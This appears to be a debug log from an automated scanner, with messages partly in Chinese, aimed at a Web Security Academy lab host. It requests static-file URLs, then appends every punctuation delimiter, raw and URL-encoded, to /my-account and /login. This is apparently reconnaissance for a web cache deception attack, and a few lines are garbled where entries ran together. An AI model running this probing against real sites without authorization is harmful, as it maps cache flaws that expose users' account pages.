2025/10/23 20:45:00 [DEBUG] Requesting URL (2/3): https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/a.gif
2025/10/23 20:45:00 [DEBUG] Requesting URL (3/3): https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/a.gif
2025/10/23 20:45:00 [DEBUG] Requesting URL (1/3): https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/a.svg
2025/10/23 20:45:00 [DEBUG] Requesting URL (2/3): https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/a.svg
2025/10/23 20:45:00 [DEBUG] Requesting URL (3/3): https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/a.svg
2025/10/23 20:45:00 [DEBUG] Requesting URL (1/3): https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/a.woff
2025/10/23 20:45:01 [DEBUG] Requesting URL (2/3): https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/a.woff
2025/10/23 20:45:01 [DEBUG] Requesting URL (3/3): https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/a.woff
2025/10/23 20:45:01 [DEBUG] Requesting URL (1/3): https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/a.woff2
2025/10/23 20:45:01 [DEBUG] Requesting URL (2/3): https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/a.woff2
2025/10/23 20:45:01 [DEBUG] Requesting URL (3/3): https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/a.woff2
2025/10/23 20:45:02 [DEBUG] Requesting URL (1/3): https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/a.ttf
2025/10/23 20:45:02 [DEBUG] Requesting URL (2/3): https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/a.ttf
2025/10/23 20:45:02 [DEBUG] Requesting URL (3/3): https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/a.ttf
2025/10/23 20:45:02 [DEBUG] Requesting URL (1/3): https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/a.eot
2025/10/23 20:45:02 [DEBUG] Requesting URL (2/3): https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/a.eot
2025/10/23 20:45:03 [DEBUG] Requesting URL (3/3): https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/a.eot
2025/10/23 20:45:03 [DEBUG] 正在为分隔符检测选择基础URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account
2025/10/23 20:45:03 [DEBUG] 正在测试分隔符 (来自字典): ‘!’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account!aa
2025/10/23 20:45:03 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%21’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%21aa
2025/10/23 20:45:03 [DEBUG] 正在测试分隔符 (来自字典): ‘“‘, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account"aa
2025/10/23 20:45:04 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%22’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%22aa
2025/10/23 20:45:04 [DEBUG] 正在测试分隔符 (来自字典): ‘#’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account#aa
2025/10/23 20:45:04 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%23’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%23aa
2025/10/23 20:45:04 [DEBUG] 正在测试分隔符 (来自字典): ‘$’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account$aa
2025/10/23 20:45:05 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%24’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%24aa
2025/10/23 20:45:05 [DEBUG] 正在测试分隔符 (来自字典): ‘%’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%aa
2025/10/23 20:45:05 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%25’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%25aa
2025/10/23 20:45:05 [DEBUG] 正在测试分隔符 (来自字典): ‘&’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account&aa
2025/10/23 20:45:05 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%26’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%26aa
2025/10/23 20:45:05 [DEBUG] 正在测试分隔符 (来自字典): ‘’’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account'aa
2025/10/23 20:45:06 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%27’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%27aa
2025/10/23 20:45:06 [DEBUG] 正在测试分隔符 (来自字典): ‘(‘, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account(aa
2025/10/23 20:45:06 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%28’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%28aa
2025/10/23 20:45:06 [DEBUG] 正在测试分隔符 (来自字典): ‘)’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account)aa
2025/10/23 20:45:06 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%29’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%29aa
2025/10/23 20:45:07 [DEBUG] 正在测试分隔符 (来自字典): ‘‘, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account*aa
2025/10/23 20:45:07 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2A’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%2Aaa
2025/10/23 20:45:07 [DEBUG] 正在测试分隔符 (来自字典): ‘+’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account+aa
2025/10/23 20:45:07 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2B’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%2Baa
2025/10/23 20:45:07 [DEBUG] 正在测试分隔符 (来自字典): ‘,’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account,aa
2025/10/23 20:45:07 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2C’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%2Caa
2025/10/23 20:45:08 [DEBUG] 正在测试分隔符 (来自字典): ‘-‘, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account-aa
2025/10/23 20:45:08 [DEBUG] 正在测试分隔符 (来自字典): ‘.’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account.aa
2025/10/23 20:45:08 [DEBUG] 正在测试分隔符 (来自字典): ‘/‘, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account/aa
2025/10/23 20:45:08 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2F’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%2Faa
2025/10/23 20:45:09 [DEBUG] 正在测试分隔符 (来自字典): ‘:’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account:aa
2025/10/23 20:45:09 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%3A’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%3Aaa
2025/10/23 20:45:09 [DEBUG] 正在测试分隔符 (来自字典): ‘;’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account;aa
2025/10/23 20:45:09 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%3B’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%3Baa
2025/10/23 20:45:09 [DEBUG] 正在测试分隔符 (来自字典): ‘<’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account', URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account>aa
2025/10/23 20:45:10 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%3E’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%3Eaa
2025/10/23 20:45:11 [DEBUG] 正在测试分隔符 (来自字典): ‘?’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account?aa
2025/10/23 20:45:11 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%3F’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%3Faa
2025/10/23 20:45:11 [DEBUG] 正在测试分隔符 (来自字典): ‘@’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account@aa
2025/10/23 20:45:11 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%40’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%40aa
2025/10/23 20:45:11 [DEBUG] 正在测试分隔符 (来自字典): ‘[‘, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account[aa
2025/10/23 20:45:12 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%5B’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%5Baa
2025/10/23 20:45:12 [DEBUG] 正在测试分隔符 (来自字典): ‘\’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account\aa
2025/10/23 20:45:12 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%5C’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%5Caa
2025/10/23 20:45:12 [DEBUG] 正在测试分隔符 (来自字典): ‘]’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account]aa
2025/10/23 20:45:12 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%5D’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%5Daa
2025/10/23 20:45:13 [DEBUG] 正在测试分隔符 (来自字典): ‘^’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account^aa
2025/10/23 20:45:13 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%5E’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%5Eaa
2025/10/23 20:45:13 [DEBUG] 正在测试分隔符 (来自字典): ‘‘, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account_aa
2025/10/23 20:45:13 [DEBUG] 正在测试分隔符 (来自字典): ‘', URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-accountaa
2025/10/23 20:45:13 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%60’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%60aa
2025/10/23 20:45:13 [DEBUG] 正在测试分隔符 (来自字典): ‘{‘, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account{aa
2025/10/23 20:45:14 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%7B’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%7Baa
2025/10/23 20:45:14 [DEBUG] 正在测试分隔符 (来自字典): ‘|’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account|aa
2025/10/23 20:45:14 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%7C’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%7Caa
2025/10/23 20:45:14 [DEBUG] 正在测试分隔符 (来自字典): ‘}’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account}aa
2025/10/23 20:45:14 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%7D’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%7Daa
2025/10/23 20:45:15 [DEBUG] 正在测试分隔符 (来自字典): ‘~’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account~aa
2025/10/23 20:45:15 [DEBUG] 正在测试分隔符 (来自字典): ‘%21’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%21aa
2025/10/23 20:45:15 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2521’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%2521aa
2025/10/23 20:45:15 [DEBUG] 正在测试分隔符 (来自字典): ‘%22’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%22aa
2025/10/23 20:45:15 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2522’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%2522aa
2025/10/23 20:45:15 [DEBUG] 正在测试分隔符 (来自字典): ‘%23’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%23aa
2025/10/23 20:45:16 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2523’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%2523aa
2025/10/23 20:45:16 [DEBUG] 正在测试分隔符 (来自字典): ‘%24’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%24aa
2025/10/23 20:45:16 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2524’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%2524aa
2025/10/23 20:45:16 [DEBUG] 正在测试分隔符 (来自字典): ‘%25’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%25aa
2025/10/23 20:45:16 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2525’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%2525aa
2025/10/23 20:45:17 [DEBUG] 正在测试分隔符 (来自字典): ‘%26’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%26aa
2025/10/23 20:45:17 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2526’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%2526aa
2025/10/23 20:45:17 [DEBUG] 正在测试分隔符 (来自字典): ‘%27’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%27aa
2025/10/23 20:45:17 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2527’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%2527aa
2025/10/23 20:45:17 [DEBUG] 正在测试分隔符 (来自字典): ‘%28’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%28aa
2025/10/23 20:45:17 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2528’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%2528aa
2025/10/23 20:45:18 [DEBUG] 正在测试分隔符 (来自字典): ‘%29’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%29aa
2025/10/23 20:45:18 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2529’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%2529aa
2025/10/23 20:45:18 [DEBUG] 正在测试分隔符 (来自字典): ‘%2A’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%2Aaa
2025/10/23 20:45:18 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%252A’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%252Aaa
2025/10/23 20:45:18 [DEBUG] 正在测试分隔符 (来自字典): ‘%2B’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%2Baa
2025/10/23 20:45:18 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%252B’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%252Baa
2025/10/23 20:45:19 [DEBUG] 正在测试分隔符 (来自字典): ‘%2C’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%2Caa
2025/10/23 20:45:19 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%252C’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%252Caa
2025/10/23 20:45:19 [DEBUG] 正在测试分隔符 (来自字典): ‘%2D’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%2Daa
2025/10/23 20:45:19 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%252D’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%252Daa
2025/10/23 20:45:19 [DEBUG] 正在测试分隔符 (来自字典): ‘%2E’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%2Eaa
2025/10/23 20:45:20 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%252E’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%252Eaa
2025/10/23 20:45:20 [DEBUG] 正在测试分隔符 (来自字典): ‘%2F’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%2Faa
2025/10/23 20:45:20 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%252F’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%252Faa
2025/10/23 20:45:20 [DEBUG] 正在测试分隔符 (来自字典): ‘%3A’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%3Aaa
2025/10/23 20:45:21 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%253A’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%253Aaa
2025/10/23 20:45:21 [DEBUG] 正在测试分隔符 (来自字典): ‘%3B’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%3Baa
2025/10/23 20:45:21 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%253B’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%253Baa
2025/10/23 20:45:21 [DEBUG] 正在测试分隔符 (来自字典): ‘%3C’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%3Caa
2025/10/23 20:45:21 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%253C’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%253Caa
2025/10/23 20:45:21 [DEBUG] 正在测试分隔符 (来自字典): ‘%3D’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%3Daa
2025/10/23 20:45:22 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%253D’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%253Daa
2025/10/23 20:45:22 [DEBUG] 正在测试分隔符 (来自字典): ‘%3E’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%3Eaa
2025/10/23 20:45:22 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%253E’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%253Eaa
2025/10/23 20:45:22 [DEBUG] 正在测试分隔符 (来自字典): ‘%3F’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%3Faa
2025/10/23 20:45:22 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%253F’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%253Faa
2025/10/23 20:45:23 [DEBUG] 正在测试分隔符 (来自字典): ‘%40’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%40aa
2025/10/23 20:45:23 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2540’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%2540aa
2025/10/23 20:45:23 [DEBUG] 正在测试分隔符 (来自字典): ‘%5B’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%5Baa
2025/10/23 20:45:23 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%255B’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%255Baa
2025/10/23 20:45:23 [DEBUG] 正在测试分隔符 (来自字典): ‘%5C’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%5Caa
2025/10/23 20:45:23 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%255C’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%255Caa
2025/10/23 20:45:24 [DEBUG] 正在测试分隔符 (来自字典): ‘%5D’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%5Daa
2025/10/23 20:45:24 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%255D’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%255Daa
2025/10/23 20:45:24 [DEBUG] 正在测试分隔符 (来自字典): ‘%5E’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%5Eaa
2025/10/23 20:45:24 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%255E’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%255Eaa
2025/10/23 20:45:24 [DEBUG] 正在测试分隔符 (来自字典): ‘%5F’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%5Faa
2025/10/23 20:45:25 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%255F’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%255Faa
2025/10/23 20:45:25 [DEBUG] 正在测试分隔符 (来自字典): ‘%60’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%60aa
2025/10/23 20:45:25 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2560’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%2560aa
2025/10/23 20:45:25 [DEBUG] 正在测试分隔符 (来自字典): ‘%7B’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%7Baa
2025/10/23 20:45:25 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%257B’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%257Baa
2025/10/23 20:45:25 [DEBUG] 正在测试分隔符 (来自字典): ‘%7C’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%7Caa
2025/10/23 20:45:26 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%257C’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%257Caa
2025/10/23 20:45:26 [DEBUG] 正在测试分隔符 (来自字典): ‘%7D’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%7Daa
2025/10/23 20:45:26 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%257D’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%257Daa
2025/10/23 20:45:26 [DEBUG] 正在测试分隔符 (来自字典): ‘%7E’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%7Eaa
2025/10/23 20:45:26 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%257E’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account%257Eaa
2025/10/23 20:45:27 [DEBUG] 正在为分隔符检测选择基础URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login
2025/10/23 20:45:27 [DEBUG] 正在测试分隔符 (来自字典): ‘!’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login!aa
2025/10/23 20:45:27 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%21’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%21aa
2025/10/23 20:45:27 [DEBUG] 正在测试分隔符 (来自字典): ‘“‘, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login"aa
2025/10/23 20:45:27 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%22’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%22aa
2025/10/23 20:45:27 [DEBUG] 正在测试分隔符 (来自字典): ‘#’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login#aa
2025/10/23 20:45:28 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%23’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%23aa
2025/10/23 20:45:28 [DEBUG] 正在测试分隔符 (来自字典): ‘$’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login$aa
2025/10/23 20:45:28 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%24’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%24aa
2025/10/23 20:45:28 [DEBUG] 正在测试分隔符 (来自字典): ‘%’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%aa
2025/10/23 20:45:28 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%25’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%25aa
2025/10/23 20:45:29 [DEBUG] 正在测试分隔符 (来自字典): ‘&’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login&aa
2025/10/23 20:45:29 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%26’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%26aa
2025/10/23 20:45:29 [DEBUG] 正在测试分隔符 (来自字典): ‘’’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login'aa
2025/10/23 20:45:29 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%27’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%27aa
2025/10/23 20:45:29 [DEBUG] 正在测试分隔符 (来自字典): ‘(‘, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login(aa
2025/10/23 20:45:29 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%28’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%28aa
2025/10/23 20:45:30 [DEBUG] 正在测试分隔符 (来自字典): ‘)’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login)aa
2025/10/23 20:45:30 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%29’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%29aa
2025/10/23 20:45:30 [DEBUG] 正在测试分隔符 (来自字典): ‘‘, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/loginaa
2025/10/23 20:45:30 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2A’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%2Aaa
2025/10/23 20:45:30 [DEBUG] 正在测试分隔符 (来自字典): ‘+’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login+aa
2025/10/23 20:45:31 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2B’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%2Baa
2025/10/23 20:45:31 [DEBUG] 正在测试分隔符 (来自字典): ‘,’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login,aa
2025/10/23 20:45:31 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2C’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%2Caa
2025/10/23 20:45:31 [DEBUG] 正在测试分隔符 (来自字典): ‘-‘, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login-aa
2025/10/23 20:45:31 [DEBUG] 正在测试分隔符 (来自字典): ‘.’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login.aa
2025/10/23 20:45:31 [DEBUG] 正在测试分隔符 (来自字典): ‘/‘, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login/aa
2025/10/23 20:45:32 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2F’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%2Faa
2025/10/23 20:45:32 [DEBUG] 正在测试分隔符 (来自字典): ‘:’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login:aa
2025/10/23 20:45:32 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%3A’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%3Aaa
2025/10/23 20:45:32 [DEBUG] 正在测试分隔符 (来自字典): ‘;’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login;aa
2025/10/23 20:45:32 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%3B’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login%3Baa
2025/10/23 20:45:32 [DEBUG] 正在测试分隔符 (来自字典): ‘<’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login', URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login>aa
